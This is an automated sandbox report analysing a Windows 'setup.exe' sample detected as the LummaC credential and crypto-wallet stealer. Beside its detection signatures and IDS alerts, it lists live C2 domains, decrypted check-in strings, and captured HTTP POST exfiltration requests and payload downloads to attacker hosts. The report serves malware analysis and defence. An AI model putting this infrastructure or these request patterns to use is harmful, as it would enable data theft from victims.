Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:setup.exe
Analysis ID:1584823
MD5:86a4951d8e5a083679b90f2509f215fe
SHA1:426588739b61c2af6b584bfda1a571a9ee991ef7
SHA256:56ba7331a6db894aa092ecfc8bf691ae04ba7e5c6b4e3ba1067e67ce43f5e673
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Infostealer behavior detected
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • setup.exe (PID: 7468 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: 86A4951D8E5A083679B90F2509F215FE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["nearycrepso.shop", "noisycuttej.shop", "regularlavhis.click", "wholersorie.shop", "abruptyopsn.shop", "framekgirus.shop", "tirepublicerj.shop", "rabidcowse.shop", "cloudewahsj.shop"], "Build id": "hRjzG3--ALFA"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x51f1f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      Process Memory Space: setup.exe PID: 7468JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: setup.exe PID: 7468JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: setup.exe PID: 7468JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            Process Memory Space: setup.exe PID: 7468JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-06T15:40:22.509497+010020283713Unknown Traffic192.168.2.449749104.21.96.1443TCP
              2025-01-06T15:40:23.593631+010020283713Unknown Traffic192.168.2.449750104.21.96.1443TCP
              2025-01-06T15:40:24.678803+010020283713Unknown Traffic192.168.2.449751104.21.96.1443TCP
              2025-01-06T15:40:26.058271+010020283713Unknown Traffic192.168.2.449752104.21.96.1443TCP
              2025-01-06T15:40:27.378073+010020283713Unknown Traffic192.168.2.449753104.21.96.1443TCP
              2025-01-06T15:40:28.816189+010020283713Unknown Traffic192.168.2.449754104.21.96.1443TCP
              2025-01-06T15:40:29.767356+010020283713Unknown Traffic192.168.2.449755104.21.96.1443TCP
              2025-01-06T15:40:30.831235+010020283713Unknown Traffic192.168.2.449756104.21.96.1443TCP
              2025-01-06T15:40:32.095620+010020283713Unknown Traffic192.168.2.449757185.161.251.21443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-06T15:40:23.125271+010020546531A Network Trojan was detected192.168.2.449749104.21.96.1443TCP
              2025-01-06T15:40:24.062654+010020546531A Network Trojan was detected192.168.2.449750104.21.96.1443TCP
              2025-01-06T15:40:31.320736+010020546531A Network Trojan was detected192.168.2.449756104.21.96.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-06T15:40:23.125271+010020498361A Network Trojan was detected192.168.2.449749104.21.96.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-06T15:40:24.062654+010020498121A Network Trojan was detected192.168.2.449750104.21.96.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-06T15:40:25.482275+010020480941Malware Command and Control Activity Detected192.168.2.449751104.21.96.1443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://regularlavhis.click/VIScAvira URL Cloud: Label: malware
              Source: https://regularlavhis.click/MiAvira URL Cloud: Label: malware
              Source: https://regularlavhis.click/buAvira URL Cloud: Label: malware
              Source: https://regularlavhis.click/api$Avira URL Cloud: Label: malware
              Source: https://regularlavhis.click/apiAvira URL Cloud: Label: malware
              Source: https://regularlavhis.click/piGWAvira URL Cloud: Label: malware
              Source: https://regularlavhis.click/YAvira URL Cloud: Label: malware
              Source: https://regularlavhis.click/jhAvira URL Cloud: Label: malware
              Source: https://regularlavhis.click/obAvira URL Cloud: Label: malware
              Source: https://regularlavhis.click/apihAvira URL Cloud: Label: malware
              Source: https://regularlavhis.click/bubAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtf1Avira URL Cloud: Label: malware
              Source: https://regularlavhis.click/pi:Avira URL Cloud: Label: malware
              Source: https://regularlavhis.click/laAvira URL Cloud: Label: malware
              Source: https://regularlavhis.click/laKAvira URL Cloud: Label: malware
              Source: https://regularlavhis.click/piAvira URL Cloud: Label: malware
              Source: regularlavhis.clickAvira URL Cloud: Label: malware
              Source: https://regularlavhis.click/Mi6aAvira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txtebKit/537.36Avira URL Cloud: Label: malware
              Source: https://regularlavhis.click/apiPAvira URL Cloud: Label: malware
              Source: https://regularlavhis.click/Avira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txtkAvira URL Cloud: Label: malware
              Source: https://cegu.shop/2Avira URL Cloud: Label: malware
              Source: https://regularlavhis.click/jhPAvira URL Cloud: Label: malware
              Found malware configuration
              Source: setup.exe.7468.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["nearycrepso.shop", "noisycuttej.shop", "regularlavhis.click", "wholersorie.shop", "abruptyopsn.shop", "framekgirus.shop", "tirepublicerj.shop", "rabidcowse.shop", "cloudewahsj.shop"], "Build id": "hRjzG3--ALFA"}
              Multi AV Scanner detection for submitted file
              Source: setup.exeReversingLabs: Detection: 13%
              Source: setup.exeVirustotal: Detection: 10%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.3% probability
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
              Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString decryptor: rabidcowse.shop
              Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString decryptor: noisycuttej.shop
              Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
              Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString decryptor: framekgirus.shop
              Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString decryptor: wholersorie.shop
              Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
              Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString decryptor: nearycrepso.shop
              Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString decryptor: regularlavhis.click
              Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--ALFA
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_03018664 CryptUnprotectData,0_2_03018664
              Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49757 version: TLS 1.2
              Source: setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\Projects\MultiCommander\BuildOutput\Output\Win32\Release v143\MultiUpdate\MultiUpdate.pdb source: setup.exe
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C8805D FindFirstFileExW,0_2_00C8805D
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C2C2ED GetFileAttributesW,FindFirstFileExW,GetLastError,FindFirstFileExW,FindFirstFileExW,GetLastError,FindClose,GetFileAttributesW,GetLastError,FindFirstFileExW,FindNextFileW,0_2_00C2C2ED
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C3C97F SetLastError,FindFirstFileW,GetLastError,0_2_00C3C97F
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C3CAC7 GetModuleHandleW,GetProcAddress,FindFirstFileW,0_2_00C3CAC7
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C40F9D __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,0_2_00C40F9D
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h0_2_010381C3
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [edi], al0_2_01050090
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax]0_2_01050345
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov word ptr [esi], cx0_2_01036372
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then push ebp0_2_0105E392
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h0_2_0103A3B3
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [ecx], al0_2_01050521
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0105056A
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, eax0_2_0104C5A2
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_010505C6
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then push eax0_2_01062412
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, ebx0_2_0103E712
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+289080F7h]0_2_0103C729
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then not eax0_2_01038731
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [ecx], dl0_2_0102E7B9
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, eax0_2_0102E7B9
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then test esi, esi0_2_0105E7F2
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+40h]0_2_0103C627
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-7Dh]0_2_01036685
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, eax0_2_0103A6A8
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_01064902
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0103C96B
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, dword ptr [0044D92Ch]0_2_01036972
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp word ptr [edi+eax], 0000h0_2_010429C2
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx esi, word ptr [eax]0_2_010649E2
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0103C826
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov eax, D6C314C9h0_2_0102A842
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_0102A842
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_01040B02
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_0105AB32
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [edi], al0_2_01050A02
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+01h]0_2_01060A12
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp dword ptr [esi+edi*8], 6A911B6Ch0_2_01038A9E
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [edi], al0_2_01050AEC
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+218BAD1Eh]0_2_0103AD67
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_01028DB2
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_01028DB2
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov edi, ecx0_2_0104CC37
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov edi, edx0_2_0104CF22
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h0_2_01060FB2
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [eax], dl0_2_0102F164
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [eax], dl0_2_0102F164
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi-000000BEh]0_2_01061022
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-0B398427h]0_2_01061022
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, eax0_2_0104B345
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov dword ptr [esi+10h], ecx0_2_010513AD
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov dword ptr [esi], edx0_2_010513AD
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h0_2_010393BA
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, eax0_2_010473F7
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov eax, ebx0_2_01037230
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov dword ptr [esi+10h], ecx0_2_01051534
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov dword ptr [esi], edx0_2_01051534
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_0104F657
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov edx, dword ptr [esi+54h]0_2_0102F9E7
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0103D9F0
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-0D67E2D4h]0_2_01047B88
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_0104BB9D
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then push eax0_2_01061BF2
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov dword ptr [esi], ecx0_2_01051A0F
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov dword ptr [esi], ecx0_2_01051A90
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0104DAD2
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp al, 20h0_2_01023D39
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09h]0_2_0103DD92
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edi, byte ptr [eax+ecx]0_2_0102DDA0
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, eax0_2_01043DA2
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h0_2_01043DA2
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then jmp eax0_2_0102FC45
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, esi0_2_01037C77
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, esi0_2_01037C77
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], AF52E86Bh0_2_01049F72
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then lea ecx, dword ptr [eax+43h]0_2_01051E65
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], AF52E86Bh0_2_03028780
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edi, byte ptr [eax+ecx]0_2_0300C5AE
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+01h]0_2_0303F220
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_03043110
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp word ptr [edi+eax], 0000h0_2_030211D0
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx esi, word ptr [eax]0_2_030431F0
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [eax], dl0_2_0300D972
              Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [eax], dl0_2_0300D972

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49756 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49749 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49750 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49751 -> 104.21.96.1:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: Malware configuration extractorURLs: regularlavhis.click
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
              Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 185.161.251.21:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.96.1:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: regularlavhis.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: regularlavhis.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1NOJGNEGR5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18114Host: regularlavhis.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MI2ER9LNNQ37XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8753Host: regularlavhis.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EKN0MGNIX3DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20394Host: regularlavhis.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=S5OQLYS040ZLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1212Host: regularlavhis.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CKYY1BGZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1042Host: regularlavhis.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: regularlavhis.click
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: regularlavhis.click
              Source: global trafficDNS traffic detected: DNS query: cegu.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: regularlavhis.click
              Source: setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: setup.exeString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
